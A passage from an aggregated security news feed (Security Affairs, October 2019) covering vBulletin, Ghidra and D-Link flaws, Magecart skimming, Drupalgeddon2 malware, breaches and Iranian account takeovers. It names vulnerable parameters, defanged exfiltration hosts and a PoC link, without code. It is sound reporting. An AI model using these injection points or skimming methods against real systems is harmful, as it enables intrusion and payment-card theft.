The vulnerability resides in the way vBulletin forum handles user requests to update avatars for their profiles, a remote attacker could exploit it to inject and execute arbitrary PHP code on the target server through unsanitized parameters. The vulnerability could not be triggered in the default installation of the vBulletin forum.

“User input passed through the “data[extension]” and “data[filedata]” parameters to the “ajax/api/user/updateAvatar” endpoint is not properly validated before being used to update users’ avatars. This can be exploited to inject and execute arbitrary PHP code.” reads the security advisory. “Successful exploitation of this vulnerability requires the “Save Avatars as Files” option to be enabled (disabled by default).”

Proof of code is available at the following URL:

http://karmainsecurity.com/pocs/CVE-2019-17132

The remaining critical vulnerabilities addressed by vBulletin are two SQL injection issues, both tracked as CVE-2019-17271.

“1) User input passed through keys of the “where” parameter to the “ajax/api/hook/getHookList” endpoint is not properly validated before being used in an SQL query. This can be exploited to e.g. read sensitive data from the database through in-band SQL injection attacks. Successful exploitation of this vulnerability requires an user account with the “canadminproducts” or “canadminstyles” permission.” reads the security advisory.

2) User input passed through keys of the “where” parameter to the “ajax/api/widget/getWidgetList” endpoint is not properly validated before being used in an SQL query. This can be exploited to e.g. read sensitive data from the database through time-based SQL injection attacks. Successful exploitation of this vulnerability requires an user account with the “canusesitebuilder” permission.

The two vulnerabilities could allow administrators with restricted privileges to read sensitive data from the database.

Romano reported all the flaws to the vBulletin maintainers on September 30 that released the following security patch updates.

Last month, vBulletin released a patch for a critical zero-day remote code execution vulnerability.

Pierluigi Paganini

(SecurityAffairs – vBulletin, hacking)

The post vBulletin addresses three new high-severity vulnerabilities appeared first on Security Affairs.

Hackers compromised Volusion infrastructure to siphon card details from thousands of sites

Hackers have compromised the infrastructure of Volusion and are distributing malicious software skimmers to steal payment card data provided by users.

Volusion is a privately-held technology company that provides ecommerce software and marketing and web design services for small and medium sized businesses. The company has over 250 employees and has served more than 180,000 customers since its founding in 1999.

Hackers have compromised the infrastructure of Volusion and are distributing malicious software skimmers to steal payment card data provided by users. Experts report more than 6,500 stores have been hacked, but they believe that tens of thousands of e-commerce platforms may have been compromised.

The discovery was made by Check Point security researcher Marcel Afrahim that shared his findings in a blog post on Medium.

The experts initially noticed that the Sesame Street Live online store was compromised, it is built with Volusion’s All-in-One E-commerce Website Builder and the name servers are maintained by the Volusion’s Name servers.

While analyzing the checkout page the expert noticed that all the resources are loading from sesamestreetlivestore.com or volusion.com affiliated websites, except for an odd javascript file being loaded from storage.googleapis.com having bucket name of volusionapi

This suggests that hackers gained access to Google Cloud infrastructure of Volusion, they were able to inject in JavaScript file the malicious code that siphons payment card details.

volusion hack

The compromised script was located at at https://storage.googleapis.com/volusionapi/resources.js and is loaded on Volusion-based online stores via the /a/j/vnav.js file.

“At its core, the additional code consists of two sections. The first section is reading the values entered at the Credit Card information fields and after a series of checks, it’s Base64 encoded along with serialization and simple shift operation, So that a simple Base64 deobfuscation would not reveal the data.” reads the post published by the researcher. “The second part of the script is responsible for reading that data stored and posting it to their primary server hxxps://volusion-cdn.com/analytics/beacon.”

Who is behind the attack?

The attackers’ TTPs suggest the involvement of one of the Magecart groups, that in the past already used public cloud storage to host their malicious scripts. 

A report recently published by RiskIQ, the experts estimated that the group has impacted millions of users. RiskIQ reports a total of 2,086,529 instances of Magecart detections, most of them are supply-chain attacks.

Pierluigi Paganini

(SecurityAffairs – Volusion, hacking)

The post Hackers compromised Volusion infrastructure to siphon card details from thousands of sites appeared first on Security Affairs.

Twitter inadvertently used Phone Numbers collected for security for Ads

Twitter admitted having “inadvertently” used phone numbers and email addresses, collected for security purposes, for advertising.

Twitter apologized to have used phone numbers and email addresses, privided by the users for security purposes, for advertising. According to the social media company, data used for account authentication were also matched with advertisers’ database to improve the efficiency of ads.

“We recently discovered that when you provided an email address or phone number for safety or security purposes (for example, two-factor authentication) this data may have inadvertently been used for advertising purposes, specifically in our Tailored Audiences and Partner Audiences advertising system.” reads a post published by Twitter.

At the time of writing it is unclear the number of impacted Twitter users.

The company attempted to downplay the severity of the privacy incident highlighting that none of the user data was shared with partners outside the company.

The Twitter Tailored Audiences product allows advertisers to target ads to customers based on the advertiser’s own marketing lists that includes info such as email addresses or phone numbers. Partner Audiences allows advertisers to use the same Tailored Audiences features to target ads to audiences provided by third-party partners.

Twitter admitted that when an advertiser uploaded their marketing list, its staff may have matched the information included in these lists with data provided by its users to protect their accounts.

The root cause of the problem was addressed in September 17, 2019.

“We cannot say with certainty how many people were impacted by this, but in an effort to be transparent, we wanted to make everyone aware. No personal data was ever shared externally with our partners or any other third parties.” added Twitter.

“We’re very sorry this happened and are taking steps to make sure we don’t make a mistake like this again,”

Pierluigi Paganini

(SecurityAffairs – Twitter, privacy)

The post Twitter inadvertently used Phone Numbers collected for security for Ads appeared first on Security Affairs.

Researchers discovered a code execution flaw in NSA GHIDRA

Security researchers discovered a code-execution vulnerability that affects versions through 9.0.4 of the Ghidra software reverse engineering (SRE) framework.

GHIDRA is a multi-platform reverse engineering framework that runs on major OSs (Windows, macOS, and Linux).

The framework was first mentioned in the CIA Vault 7 dump that was leaked in 2017. WikiLeaks obtained thousands of files allegedly originating from a CIA high-security network that details CIA hacking techniques, tools, and capabilities. Digging in the huge trove of files, it is possible to find also information about the GHIDRA, a Java-based engineering tool.

NSA has released the suite Ghidra in March, it could be used to find vulnerabilities and security holes in applications.

Ghidra is Apache 2.0-licensed and requires a Java runtime, it is available
for download here. Of course, people fear the US Agency may have introduced a backdoor in the suite, but the NSA excluded it.

A couple of weeks ago, security researchers discovered a vulnerability in the Ghidra tool, tracked as CVE-2019-16941, that could be exploited by an attacker to execute arbitrary code within the context of the affected application. The researchers discovered that the flaw could be exploited only when the experimental mode is enabled.

The vulnerability resides in the Read XML Files feature of Bit Patterns Explorer, an attacker could exploit it by using modified XML documents.

“NSA Ghidra through 9.0.4, when experimental mode is enabled, allows arbitrary code execution if the Read XML Files feature of Bit Patterns Explorer is used with a modified XML document.” reads the security advisory. “This occurs in Features/BytePatterns/src/main/java/ghidra/bitpatterns/info/FileBitPatternInfoReader.java. An attack could start with an XML document that was originally created by DumpFunctionPatternInfoScript but then directly modified by an attacker (for example, to make a java.lang.Runtime.exec call).”

The vulnerability has been rated as “critical severity” and received a CVSS score of 9.8.

The NSA attempted to downplay the severity of the flaw explaining that it is hard to exploit.

The good news is that the issue has been already fixed, a patch is available for those who build Ghidra themselves from the master branch.

The Ghidra 9.1 release, that is currently in beta testing, will also address the flaw.

Pierluigi Paganini

(SecurityAffairs – NSA, hacking)

The post Researchers discovered a code execution flaw in NSA GHIDRA appeared first on Security Affairs.

MS October 2019 Patch Tuesday updates address 59 flaws

Microsoft October 2019 Patch Tuesday addressed a total of 59 vulnerabilities. 9 of which are rated as critical and 49 as important.

The tech giant released its October 2019 Patch Tuesday security updates to address a total of 59 vulnerabilities in Windows operating systems and other software, 9 of which are rated as ‘critical’, 49 are ‘important’, and one ‘moderate’.

None of the vulnerabilities addressed by Microsoft was exploited by attackers in the wild or was publicly known.

Microsoft addressed two critical remote code execution flaws, tracked as CVE-2019-1238 and CVE-2019-1239, in the VBScript engine, both tie the way VBScript handles objects in memory. An attacker could exploit the flaw to cause memory corruption and execute arbitrary code in the context of the current user.

An attacker could trigger the flaws by tricking the victims into visiting a specially crafted website through Internet Explorer.

The attacker could also exploit these flaws using an application or Microsoft Office document that embeds an ActiveX control marked ‘safe for initialization’ that leverages the Internet Explorer rendering engine.

Microsoft addressed three critical memory corruption flaws in the Chakra scripting engine that could lead to remote code execution. The vulnerabilities affect the way Chakra scripting engine handles objects in memory in Microsoft Edge.

Microsoft has addressed a reverse RDP attack, an attacker could exploit the flaw to compromise client computers connecting to a malicious RDP server by exploiting a critical remote code execution issue in Windows built-in Remote Desktop Client application.

The attack scenario sees threat actors tricking victims into connecting to a malicious RDP server.

October 2019 Patch Tuesday security updates also addressed two NTLM authentication vulnerabilities, tracked as CVE 2019-1166 and CVE-2019-1338 that could be exploited by attackers to bypass the MIC (Message Integrity Code) protection on NTLM authentication.

“A tampering vulnerability exists in Microsoft Windows when a man-in-the-middle attacker is able to successfully bypass the NTLM MIC (Message Integrity Check) protection. An attacker who successfully exploited this vulnerability could gain the ability to downgrade NTLM security features.” reads the security advisory for the CVE 2019-1166.

“To exploit this vulnerability, the attacker would need to tamper with the NTLM exchange. The attacker could then modify flags of the NTLM packet without invalidating the signature.”

The full list of vulnerabilities addressed with the release of October 2019 Patch Tuesday updates is available here.

Pierluigi Paganini

(SecurityAffairs – October 2019 Patch Tuesday updates, hacking)

The post MS October 2019 Patch Tuesday updates address 59 flaws appeared first on Security Affairs.

Experts found a link between a Magecart group and Cobalt Group

Researchers from MalwareBytes and HYAS Threat Intelligence linked one of the hacking groups under the Magecart umbrella to the notorious Cobalt cybercrime Group.

Hacker groups under the Magecart umbrella continue to target organizations worldwide to steal payment card data with so-called software skimmers. Security firms have monitored the activities of a dozen groups at least since 2010

According to a joint report published by RiskIQ and FlashPoint, some groups are more advanced than others, in particular, the gang tracked as Group 4 appears to be very sophisticated.

The list of victims of the groups is long and includes several major platforms such as British AirwaysNeweggTicketmasterMyPillow and Amerisleep, and Feedify

Millions of Magecart instances were detected over time, security experts discovered tens of software skimming scripts.

Researchers at RiskIQ estimate that the group has impacted millions of users. RiskIQ reports a total of 2,086,529 instances of Magecart detections, most of them are supply-chain attacks.

The same team of experts has determined that the Magecart infrastructure is vast, with 573 known C2 domains, and 9,189 hosts observed loading C2 domains. 

A new joint report published by researchers at Malwarebytes and HYAS Threat Intelligence reveals that some groups under the Magecart umbrella are linked to Magecart attackers.

The experts found a link between the Magecart Group 4 and the Cobalt cybercrime Gang, such as patterns in the email addresses used to register domains used in Magecart operations.

“One group that caught our interest is Group 4, which is one of the more advanced cybercriminal organizations. While working jointly with security firm HYAS, we found some interesting patterns in the email addresses used to register domains belonging to Magecart matching those of a sophisticated threat group known as Cobalt Group, aka Cobalt Gang or Cobalt Spider.” reads the blog post published by MalwareBytes.

Cobalt crime gang is a Russian hacking crew that has been active since at least 2016, it targeted banks worldwide, the group leveraged spear-phishing emails to compromise target systems, spoofed emails from financial institutions or a financial supplier/partner.

Experts pointed out that Group 4, unlike other Magecart groups, leverages on both client-side and server-side skimmers.

One of client-side skimmers analyzed by the researchers was masqueraded as the jquery.mask.js plugin, the attackers appended the malicious code at the end of the script and protected it with some layers of obfuscation. 

Experts also analyzed a server-side skimmer, it is a PHP script that was mistakenly served as JavaScript instead.

“This little code snippet looks for certain keywords associated with a financial transaction and then sends the request and cookie data to the exfiltration server at secureqbrowser[.]com. An almost exact copy of this script was described by Denis Sinegubko of Sucuri in his post Autoloaded Server-Side Swiper.” continues the report.

Experts noticed that in both attacks, the domains were registered to robertbalbarran(at)protonmail.com.

The analysis of the exfiltration gates allowed the researchers to link them to other registrant emails and identify a pattern for the format of email addresses ([first name][initial][last name]).

Experts noticed that the Cobalt Group also has switched to this technique.

“A small shift from one of their previous conventions of [firstname],[lastname], [fournumbers] (overwhelmingly using protonmail accounts, with a handful of tutanota/keemail.me email accounts) changed to the above-noted convention of [firstname], [initial], [lastname] again using the same email services and registrars, and notably the same use of privacy protection services.” continues the experts.

Further investigation allowed the experts to discover that 10 of the seemingly separate accounts reused only two different IP addresses, even over weeks and months between registrations.

One email address, petersmelanie(at)protonmail.com, was used to register 23 domains, including one involved in a phishing campaign leveraging the CVE-2017-0199 flaw and other attacks against Oracle and various banks.

“Based on their historical ties to the space, and the entrance of sophisticated actor groups such as FIN6 and others, it’s logical to conclude that Cobalt Group would also enter this field and continue to diversify their criminal efforts against global financial institutions,” concludes the report. “The use of both client-side and server-side skimmers and the challenges this poses in identifying Magecart compromises by advanced threat groups necessitates the ongoing work of industry partners to help defend against this significant and growing threat.”

Pierluigi Paganini

(SecurityAffairs – Magecart, Cobalt group)

The post Experts found a link between a Magecart group and Cobalt Group appeared first on Security Affairs.

Developer hacked back Muhstik ransomware crew and released keys

One of the victims of the Muhstik ransomware gang who initially paid the ransomware, decided to hack back the crooks and released their decryption keys.

Tobias Frömel, is a German software developer, who was a victim of the Muhstik ransomware. Frömel initially paid the ransom to decrypt his files, but later decided to get his revenge on the crooks.

The expert hacked the server used by the Muhstik ransomware gang and released the decryption keys for all the victims of the group.

Muhstik is piece of ransomware that has been first detected in the wild late September while targeting QNAP network-attacked storage (NAS) devices.

Attackers first get access to the NAS devices through brute-force attacks on the built-in phpMyAdmin service, then encrypt their content and append the “.muhstik” extension to their filenames.

This ransomware targets network-attacked storage (NAS) devices made by Taiwanese hardware vendor QNAP. The gang behind the Muhstik ransomware is brute-forcing QNAP NAS devices that use weak passwords for the built-in phpMyAdmin service.

“The Muhstik ransomware is reportedly being used to target QNAP NAS devices. Devices using weak SQL server passwords and running phpMyAdmin may be more vulnerable to attacks.” states the security advisory published by QNAP.

“We strongly recommend that users act immediately to protect their data from possible malware attacks.

The developer published on Pastebin the 2,858 decryption keys found on the hacked server and clarified that he was aware that the hack back is not legal.

hope you all got that decrypter execution file, if not i still have it and yeah, I know it was not legal from me,” wrote the researcher. “I’m not the bad guy here,”

Frömel also published a decrypter that could be used by the victims of the Muhstik ransomware to unlock their files.

In the meantime, Frömel has been busy notifying Muhstik victims on Twitter about the decrypter’s availability, advising users against paying the ransom.

According to ZDNet, which first reported the news, Frömel notified authorities and also provided information to track down members of the Muhstik gang.

This case highlights the importance of working with the authorization of law enforcement before conducting hacking back.

Pierluigi Paganini

(SecurityAffairs – Muhstik ransomware, hacking)

The post Developer hacked back Muhstik ransomware crew and released keys appeared first on Security Affairs.

Users reported problems with patches for CVE-2019-1367 IE zero-day

Patches for Internet Explorer Zero-Day Causing Problems for Many Users

Microsoft released a new set of patches for a zero-day flaw in Internet Explorer recently fixed due to problems reported by users with the previous patch.

On September 23, Microsoft released an out-of-band patch to address a zero-day memory corruption flaw in Internet Explorer (CVE-2019-1367) that has been exploited in attacks in the wild.

The vulnerability resides in the Internet Explorer’s scripting engine, it affects the way that objects in memory are handled. 

An attacker could exploit the vulnerability to gain the same privileges as the current user, the attack could be critical if the current user gains administrative privileges.

In order to exploit the vulnerability, an attacker could host a specially crafted website that is designed to trigger the flaw when Internet Explorer users will visit it. The attacker only has to trick victims into visiting the malicious website, for example, by sending to the victims a link to the malicious website via email or in a malicious email attachment (HTML file, PDF file, Microsoft Office document) that supports embedding the scripting engine content.

“A remote code execution vulnerability exists in the way that the scripting engine handles objects in memory in Internet Explorer. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user.” reads the security advisory published by Microsoft. “An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. If the current user is logged on with administrative user rights, an attacker who successfully exploited the vulnerability could take control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. “

On October 3, Microsoft released another set of patches for the zero-day vulnerability, because some users experienced certain printing issues following the installation of the initially released by the tech giant.

“To address a known printing issue customers might experience after installing the Security Updates or IE Cumulative updates that were released on September 23, 2019 for CVE-2019-1367, Microsoft is releasing new Security Updates, IE Cumulative Updates, and Monthly Rollup updates for all applicable installations of Internet Explorer 9, 10, or 11 on Microsoft Windows,” reads Microsoft Security Update Releases notification email sent to the users.

Several users reported that the cumulative update released by Microsoft is causing also boot issues and the crash of the start menu.

Microsoft pointed out that the IE Cumulative updates are separate from the October Patch Tuesday updates which are scheduled for October 8.

Pierluigi Paganini

(SecurityAffairs – CVE-2019-1367, hacking)

The post Users reported problems with patches for CVE-2019-1367 IE zero-day appeared first on Security Affairs.

Hackers continue to exploit the Drupalgeddon2 flaw in attacks in the wild

Researchers from Akamai uncovered a new campaign targeting the Drupalgeddon2 vulnerability to deliver malware.

The popular security expert Larry W. Cashdollar from Akamai has uncovered a new campaign targeting the popular Drupalgeddon2 vulnerability (CVE-2018-7600) to deliver malware.

Drupalgeddon2 is a “highly critical” vulnerability that affects Drupal 7 and 8 core, it could be exploited by an attacker to run arbitrary code on the CMS core component and take over a website just by accessing an URL.

The Drupal development team has fixed the vulnerability in March 2018, but hackers continue to target Drupalgeddon2 in the wild.

The campaign recently discovered by Cashdollar sees the attackers attempting to run malicious code embedded in a .gif file.

The expert explained that the campaign is currently not widespread, it is targeting a broad range of high profile websites.

“I observed an attack that  is designed to run code that is embedded inside a .gif file. While embedding code in image file isn’t a new attack method, I haven’t seen this method in quite some time.” reads the analysis published by Cashdollar.

“The attack traffic doesn’t appear to be widespread at this time, nor does it appear to be specifically targeting a single industry vertical. Currently, the attack traffic seems to be directed towards a random assortment of high profile websites. The code I will be examining is embedded in the file index.inc.gif, which appears to be hosted on a compromised bodysurfing website located in Brazil.”

One of .gif files analyzed by the experts was hosted on a compromised bodysurfing website located in Brazil. The file contained obfuscated PHP code designed to decode base64-encoded malware that was stored by threat actors in a variable.

“The commands clean up any previous installations and then replace any .htaccess configurations with versions that have less restrictive settings.” continues the analysis. Then two different files are downloaded and then executed. The first, index.inc.gif, contains obfuscated PHP code. It contains a GIF header, but the rest of the file is PHP code obscured using gzip compression, rot13, and base64 encoding.”

The malware supports several functions, such as scanning local files for credentials, sending email with the discovered credentials, replacing the local .htaccess file, displaying MySQL my.cnf configuration files, execute a remote file that is gz compressed and base64 encoded, showing system information, renaming files, uploading files, and launching a web shell.

The campaign also delivers a piece of malware stored in a .txt containing a Perl script that leverages Internet Relay Chat (IRC) for command and control (C&C) communication. The malware implements common RAT features and is also able to launch distributed denial-of-service (DDoS) attacks.

The malware also implements functionalities to gather information from the local system and to control infected systems, it also supports a SQL flood command. The fact that attackers are still exploiting the Drupalgeddon2 flaw highlights the importance of patch management in enterprises.

“Critical vulnerabilities will be targeted, even if their public disclosure date is over a year old. When the vulnerability’s exploitation is simple, which is the case with Drupalgeddon2, attackers will automate the process of scanning, exploitation, and infection when there are poorly maintained and forgotten systems.” Cashdollar concludes. “This creates a problem for enterprise operations and web administrators, as these old forgotten installs are often connected to other critical systems — creating a pivot point on the network.”

“Maintaining patches in a timely fashion, as well as properly decommissioning servers if they’re no longer being used is the best preventative measure that administrators and security teams can take.” 

Pierluigi Paganini

(SecurityAffairs – Drupalgeddon2, hacking)

The post Hackers continue to exploit the Drupalgeddon2 flaw in attacks in the wild appeared first on Security Affairs.

D-Link router models affected by remote code execution issue that will not be fixed

Researchers at Fortinet’s FortiGuard Labs have publicly disclosed a critical remote code execution vulnerability affecting some models of D-Link routers. 

Security experts at Fortinet’s FortiGuard Labs disclosed a remote code execution vulnerability tracked as CVE-2019-16920. The vulnerability is an unauthenticated command injection issue that was discovered on September 2019. The flaw has received a CVSS v31 base score of 9.8 and a CVSS v20 base score of 10.0. 

The bad news for the users is that the vendor will not address it because it affects discontinued products.  

According to the Fortinet, the vulnerability impacts D-Link firmware in the DIR-655, DIR-866L, DIR-652, and DHP-1565 router families.

D-Link router

“In September 2019, Fortinet’s FortiGuard Labs discovered and reported an unauthenticated command injection vulnerability (FG-VD-19-117/CVE-2019-16920) in D-Link products that could lead to Remote Code Execution (RCE) upon successful exploitation. We rated this as a critical issue since the vulnerability can be triggered remotely without authentication.” reads the security advisory published by Fortinet.

The vulnerability could be exploited by an attacker sending arbitrary input to a “PingTest” gateway interface to achieve command injection.

“The vulnerability begins with a bad authentication check. To see the problem in action, we start at the admin page and then perform a login action.” continues the advisory. “Here, we implement the POST HTTP Request to “apply_sec.cgi” with the action ping_test. We then perform the command injection in ping_ipaddr. Even if it returns the login page, the action ping_test is still performed – the value of ping_ipaddr will execute the “echo 1234” command in the router server and then send the result back to our server. “

The experts discovered that it is possible to execute code remotely, even without the necessary privileges, due to bad authentication check.

The researchers reported the vulnerability to D-Link on September 22, the vendor the day after acknowledged the issue, but three days later confirmed that no patch will be released because the products are at End of Life (EOL),

Below the disclosure timeline:

  • 22 September, 2019: FortiGuard Labs reported the vulnerability to D-Link.
  • 23 September, 2019: D-Link confirmed the vulnerability
  • 25 September, 2019: D-Link confirmed these products are EOL
  • 3 October 2019: Public disclosure of the issue and released advisory

Pierluigi Paganini

(SecurityAffairs – routers, hacking)

The post D-Link router models affected by remote code execution issue that will not be fixed appeared first on Security Affairs.

US will help Baltic states to secure baltic energy grid

The United States and Baltic announced cooperation to protect the Baltic energy grid from cyber attacks as they disconnect from the Russian electricity grid.

The US and Baltic agreed to cooperate to protect the Baltic energy grid from cyber attacks as they disconnect from the Russian electricity grid.

US Energy Secretary Rick Perry and counterparts from Lithuanian, Latvian and Estonian counterparts announced the cooperation for the protection of Baltic Energy Grid against cyber attacks in this “critical moment.”

“We see a crucial role that US could play in assisting the Baltic States with strategic and technical support,” reads a joint declaration signed by the officials in the Lithuanian capital Vilnius.

The three states joined both the European Union and NATO in 2004, but they are still part of a power grid controlled by Russia. The three countries will be integrated into the European energy grid by 2025, without depending on the Russian grid.

Lithuanian critical infrastructure, and in particular, organizations in the energy sector, are privileged targets of cyber attacks.

In May 2017, a wave of “exploratory” cyber attacks targeted energy networks of the Baltic states. Baltic attacks raised concerns that foreign states could disable the energy networks in the region.

Experts suspected the involvement of a Russian state actor due to the strategic interest of Russia in the states that are on the political front line between Russia and the West.

“Suspected Russia-backed hackers have launched exploratory cyber attacks against the energy networks of the Baltic states, sources said, raising security concerns inside the West’s main military alliance, NATO.” reported the Reuters agency, “The Baltics are locked into Russia’s power network but plan to synchronize their grids with the EU.”

NATO experts and cybersecurity researchers believe hackers were testing the Baltic energy networks for weaknesses.

Now Lithuania confirmed it was looking for US technology firms to prevent the hack of control energy systems that could disrupt energy supplies.

“Energy minister Zygimantas Vaiciunas said the Baltic ministers also agreed with Perry to set up a cooperation platform for cyber security experts from all four countries within the next six months.” continues the AFP press.

Perry is promoting US liquified natural gas (LNG) exports to Europe, both Lithuania and Poland have already begun importing it.

“We hope that all the citizens of Europe recognize that we certainly look at this (US LNG exports) as a great opportunity to bring more freedom to the marketplace, more competition to the marketplace,” Perry told reporters in Vilnius.

Pierluigi Paganini

(SecurityAffairs – Baltic Energy Grid, hacking)

The post US will help Baltic states to secure baltic energy grid appeared first on Security Affairs.

Data from Sephora and StreetEasy data breaches added to HIBP

The popular data breach notification service Have I Been Pwned? (HIBP) has added the stolen data from the StreetEasy and Sephora data incidents.

Have I Been Pwned? (HIBP), the popular service that allows users to check whether their personal data has been compromised by data breaches has added the stolen data from the StreetEasy and Sephora data incidents.

Users can check if their data have been exposed in the StreetEasy and Sephora data breaches.

The StreetEasy data breach took place in the mid-2016 and exposed 988k records that included names, usernames, email addresses and SHA-1 password hashes. The data has been available for sale in the cybercrime underground since February. In February, Gnosticplayers hacker offered a third round of databases containing millions of hacked accounts from unreported data breaches, including Streeteasy (Real estate) with 990,000 records.

“In approximately June 2016, the real estate website StreetEasy suffered a data breach. In total, 988k unique email addresses were included in the breach alongside names, usernames and SHA-1 hashes of passwords, all of which appeared for sale on a dark web marketplace in February 2019. The data was provided to HIBP by a source who requested it be attributed to “JimScott.Sec@protonmail.com”.” reads HIBP.

HIBP also included data from a data breach suffered by Sephora Southeast Asia in January 2017 that exposed data for 780,073 customers, including customer’s dates of birth, email addresses, ethnicities, genders, names, and physical attributes.

“In approximately January 2017, the beauty store Sephora suffered a data breach. Impacting customers in South East Asia, Australia and New Zealand, 780k unique email addresses were included in the breach alongside names, genders, dates of birth, ethnicities and other personal information. The data was provided to HIBP by a source who requested it be attributed to “JimScott.Sec@protonmail.com”.” reads HIBP.

Data from the Sephora data breach has been seen being also sold on online hacker forums.

Users impacted by the data breaches have to change their passwords also on every site that shares the same credentials.

Pierluigi Paganini

(SecurityAffairs – StreetEasy, data breach)

The post Data from Sephora and StreetEasy data breaches added to HIBP appeared first on Security Affairs.

PoS malware infections impacted four restaurant chains in the U.S.

Four restaurant chains in the U.S. disclosed payment card theft via PoS malware that took place over the summer.

Four restaurant chains in the United States disclosed security breaches that impacted their payment systems over the summers, crooks used PoS malware to steal payment card data of the customers.

The restaurant chains are McAlister’s Deli, Moe’s Southwest Grill, Schlotzsky’s, and Hy-Vee, they confirmed the presence of PoS malware at certain locations.

Moe’s, McAlister’s and Schlotzsky’s are owned by Focus Brands, the fact that they simultaneously disclosed the payment card breaches suggests that attackers were able to compromise some infrastructure shared by the two restaurant chains.

The three restaurant chains confirmed that hackers compromised the payment systems in a period between April 29, 2019 and July 22, 2019. 

“A thorough investigation is being conducted and is nearly complete. It appears that unauthorized code designed to copy payment card data from cards used in person was installed in certain corporate and franchised restaurants at different times over the general period of April 29, 2019 to July 22, 2019.” reads an excerpt of a data breach notification published by the three brands.

Only Schlotzsky’s reported that the attacks begun on April 11, 2019, the other two confirmed that attacks started on April 29.

The three restaurant chains reported that the PoS malware was discovered only at certain locations, and at most locations it was present for only a few weeks in July.

The brands did not reveal the number of impacted customers.

Customers were initially alerted about the incident on August 20, when the restaurant chains were investigating the security incidents.

The PoS malware was designed to capture data from the magnetic stripe of a payment card during the payment process, including the card number, expiration date, and internal verification code, and sometimes it the cardholder name.

The fourth brand that suffered a payment card breach is Hy-Vee, the restaurant chain provided an update to the notice of payment card data incident released on August 14.

The company confirmed that on July 29, crooks compromised some payment processing systems, in this case, the PoS malware remained active more than a month.

The update provided by the company revealed that infections at the fuel pumps began on December 14, 2018, while payment systems at restaurants and drive-thru coffee shops were infected starting January 15.

“The specific timeframes when data from cards used at these locations involved may have been accessed vary by location over the general timeframe beginning December 14, 2018, to July 29, 2019 for fuel pumps and beginning January 15, 2019, to July 29, 2019, for restaurants and drive-thru coffee shops.” reads the update provided by the company. “There are six locations where access to card data may have started as early as November 9, 2018, and one location where access to card data may have continued through August 2, 2019.”

The company also published a Location Look Up Tool to determine the Hy-Vee impacted locations.

Pierluigi Paganini

(SecurityAffairs – restaurant chains, PoS malware)

The post PoS malware infections impacted four restaurant chains in the U.S. appeared first on Security Affairs.

Iran-linked Phosphorus group hit a 2020 presidential campaign

Microsoft says that the Iran-linked cyber-espionage group tracked as Phosphorus (aka APT35Charming KittenNewscaster, and Ajax Security Team) a 2020 presidential campaign.

Microsoft’s Threat Intelligence Center (MSTIC) revealed that an Iran-linked APT group tracked as Phosphorus (aka APT35Charming KittenNewscaster, and Ajax Security Team) attempted to access to email accounts belonging to current and former US government officials, journalists, Iranians living abroad, and individuals involved in a 2020 US presidential campaign.

The Phosphorus group made the headlines in 2014 when experts at iSight issued a report describing the most elaborate net-based spying campaign organized by Iranian hackers using social media.

Microsoft has been tracking the threat actors at least since 2013, but experts believe that the cyberespionage group has been active since at least 2011. 

The experts revealed that the recent campaign carried out by the APT group took place between August and September.

“In a 30-day period between August and September, the Microsoft Threat Intelligence Center (MSTIC) observed Phosphorus making more than 2,700 attempts to identify consumer email accounts belonging to specific Microsoft customers and then attack 241 of those accounts.” reads the analysis published by Microsoft. “The targeted accounts are associated with a U.S. presidential campaign, current and former U.S. government officials, journalists covering global politics and prominent Iranians living outside Iran.”

The state-sponsored hackers initially conducted a reconnaissance operation to identify high-value targets. Microsoft observed more than 2,700 probes, then the attackers targeted 241 accounts, some of them associated with a U.S. Presidential campaign.

Microsoft confirmed that hackers breached four accounts, but the compromised accounts were not associated with the U.S. Presidential campaign or current and former U.S. government officials.

Microsoft notified all the impacted users about the hacks and provided supports to the victims to secure their accounts.

The hackers initially breached into the victim’s secondary email inbox associated with their Microsoft account, then used them to reset the password. Once they received the reset link to the secondary inbox, the hackers used it to take control of the primary Microsoft account.

“Phosphorus used information gathered from researching their targets or other means to game password reset or account recovery features and attempt to take over some targeted accounts.” continues the report. “For example, they would seek access to a secondary email account linked to a user’s Microsoft account, then attempt to gain access to a user’s Microsoft account through verification sent to the secondary account. In some instances, they gathered phone numbers belonging to their targets and used them to assist in authenticating password resets.”

Microsoft experts pointed out that the attacks attributed to the Phosphorus group even if they were not technically sophisticated used a significant amount of personal information to identify the targets’ accounts and hack them. 

Microsoft recommends its high-profile Microsoft involved in political campaigns, think tanks, or NGOs, to sign up for Microsoft AccountGuard that offers additional protection against the attacks.

“There are currently 60,000 accounts in 26 countries protected by AccountGuard, which provides monitoring and unified threat notification across the Office 365 accounts you use for work and the personal accounts of your staff and others affiliated with your organization that opt-in for this protection.” concludes Microsoft. “To date, we’ve made more than 800 notifications of attempted nation-state attacks to AccountGuard customers.

In March, Microsoft announced that it had taken control of 99 domains used by an Iran-linked APT group tracked by the company as Phosphorus.

The domains attempted to mimic legitimate services belonging to Microsoft and other legitimate online services, such as LinkedIn and Yahoo. The list of seized domains includes verification-live.com, outlook-verify.net, myaccount-services.net, verify-linkedin.net, and yahoo-verify.net.

The threat actors used the websites to serve malware to the victims, they also sent out emails alerting recipients of a security risk in order to trick them into handing over their account credentials.

Pierluigi Paganini

(SecurityAffairs – Iran, hacking)

The post Iran-linked Phosphorus group hit a 2020 presidential campaign appeared first on Security Affairs.

Security Affairs newsletter Round 234

A new round of the weekly newsletter arrived! The best news of the week with Security Affairs

Hi folk, let me inform you that I suspended the newsletter service, anyway I’ll continue to provide you a list of published posts every week through the blog.

Once again thank you!

Hacker claims to have stolen over 218M Zynga ‘Words with Friends Gamers records

Masad Stealer Malware exfiltrates data via Telegram

Phishers continue to abuse Adobe and Google Open Redirects

WhiteShadow downloader leverages Microsoft SQL to retrieve multiple malware

A new critical flaw in Exim exposes email servers to remote attacks

Arcane Stealer V, a threat for lower-skilled adversaries that scares experts

eGobbler ‘s malvertising campaign hijacked over 1 billion ad impressions

Exclusive: MalwareMustDie analyzes a new IoT malware dubbed Linux/ AirDropBot

Irans oil minister orders ‘Full Alert for oil sector on against attacks

Microsoft will add new file types to the list of blocked ones in Outlook on the Web

A new Adwind variant involved in attacks on US petroleum industry

Danish company Demant expects to incur losses of up to $95 after cyber attack

Danish company Demant expects to incur losses of up to $95 Million after cyber attack

Frequent VBA Macros used in Office Malware

Gucci IOT Bot Discovered Targeting European Region

Hackers breached one of Comodo Forums, 245,000 users impacted

Singapore presented the Operational Technology (OT) Cybersecurity Masterplan

